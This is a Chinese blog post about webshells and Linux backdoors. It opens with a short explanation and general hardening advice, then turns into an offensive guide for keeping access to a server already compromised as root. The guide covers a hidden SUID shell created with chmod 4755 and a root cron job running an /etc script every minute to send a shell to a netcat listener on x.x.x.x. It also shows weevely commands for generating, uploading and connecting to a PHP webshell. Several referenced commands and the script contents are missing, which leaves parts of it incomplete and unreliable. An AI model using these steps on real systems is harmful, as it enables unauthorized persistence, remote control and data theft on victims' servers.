
Webshell后门文件通常由黑客以PHP、ASP等Web编程语言编写,并伪装成一些正常的文件类型,如图片、HTML文件、JS等等。当被安装在服务器上,Webshell后门文件隐藏在受害者服务器的某个目录中,黑客可以通过它随时访问和控制受害者服务器。
Webshell后门文件对于攻击者来说是非常有用的,因为它可以让攻击者在受害者服务器上执行远程代码,并从受害者服务器上获取所有敏感信息,如数据库账号密码、文件等等。
为了防止Webshell后门文件的攻击,服务器管理员应该定期检查系统安全性,及时修复服务器上存在的漏洞,设置强密码、安装防火墙等等。此外,及时更新服务器软件、及时扫描病毒、加密敏感文件等也是防止Webshell后门文件攻击的重要手段。
linux后门
一、前提:已经是root用户,想留一个后门
suid shell
.woot前面的'.'并不是必须的,只是为了隐藏文件( 在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏) .
chmod 4755——作用,使所有使用.woot文件的用户都具有文件所有者的权限
此时权限并没有改变,因为bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:
二、Unix Bash 远控后门
先创建 /etc/xxxx 脚本文件
设置权限 chmod +sx /etc/door
修改一下 /etc/crontab 让它定时执行
nano /etc/crontab 在 /etc/crontab 文件末加入这一行。代表每 1 分钟执行一次。
*/1 * * * * root /etc/xxxx
最后重启一下 crond 的服务。(不同发行版重启方式不一样,自行查询)
service cron reload
service cron start
然后在 x.x.x.x 的服务器上使用nc 接收 Shell 即可。
三、常见的Web后门
weevely——针对php
生成密码为123的后门文件
weevely generate 123 /root/weevely.php
上传到目标服务器,然后远程连接
weevely <目标URL><密码>就能成功连接上了
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)